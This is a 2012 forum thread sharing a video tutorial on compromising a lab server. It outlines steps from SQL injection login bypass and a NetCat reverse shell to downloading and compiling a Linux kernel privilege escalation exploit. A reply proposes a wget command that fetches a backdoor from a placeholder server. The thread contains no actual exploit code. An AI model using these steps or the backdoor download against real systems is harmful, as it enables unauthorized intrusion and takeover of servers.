Welcome, Guest: Register On Nairaland / LOGIN! / Trending / Recent / NewStats: 3,156,788 members, 7,831,545 topics. Date: Friday, 17 May 2024 at 08:41 PM |
Nairaland Forum / Science/Technology / Webmasters / [VIDEO] Rooting A Box (local Command Execution) (647 Views)
CSS :: Create A Box Shadow In Different Dimensions / Remote Code Execution Vulnerability In PHP Still Unresolved / Any Complete Package(business-in-a-box) For A Newbie In Info Marketing (2) (3) (4)
(1) (Reply)
[VIDEO] Rooting A Box (local Command Execution) by Slyr0x: 8:50am On Aug 31, 2012 |
In this session, we will be having a look at gaining root privileges using command execution Basically, we'll be seeing how a "simple" SQL Injection can lead to an attacker completely compromising your server [flash=600,500] https://www.youtube.com/watch?v=2_tfyF_7KWk[/flash] Steps * Discover network for hosts (Netdiscover) * Scan target network (Nmap) * Bypass login screen (MySQL Injection) * Set NetCat to listen on attack machine * Inject bash reverse shell. * Navigate to directory where apache user can write files (cd /tmp) * Search for Local privilege escalation exploit for linux kernel version 2.6 * Download exploit code and host it on attack machine * Use reverse shell to wget exploit code to Victim’s machine * Compile exploit code and Execute. * Game Over Blog Post here: http://rotimiakinyele.com/posts/rooting-a-box-local-command-execution.jsp |
Re: [VIDEO] Rooting A Box (local Command Execution) by Nobody: 10:35am On Aug 31, 2012 |
thats very rear in the real world, pass in user submitted parameters directly to the shell? you could just "wget http://someserver.com/backdoor.php" on very first login. and save yourself some stress nice tut. |
Re: [VIDEO] Rooting A Box (local Command Execution) by Slyr0x: 11:15am On Sep 03, 2012 |
webdezzi: thats very rear in the real world, pass in user submitted parameters directly to the shell? You'd be surprised that Local command execution still exists in the real world. .Recently, this vuln was discovered in Boxee (a cross-platform freeware Home Theater PC software application). .You can watch the exploitation vid here https://www.youtube.com/watch?v=-_wZiFmrwsw Thanks for dropping by |
(1) (Reply)
Cheap Hosting In Nigeria / A Ready E-commerce Site For A Phone Shop + Facebook And Twitter Ready / I Have $200 Paypal For Sale!
(Go Up)
Sections: politics (1) business autos (1) jobs (1) career education (1) romance computers phones travel sports fashion health religion celebs tv-movies music-radio literature webmasters programming techmarket Links: (1) (2) (3) (4) (5) (6) (7) (8) (9) (10) Nairaland - Copyright © 2005 - 2024 Oluwaseun Osewa. All rights reserved. See How To Advertise. 9 |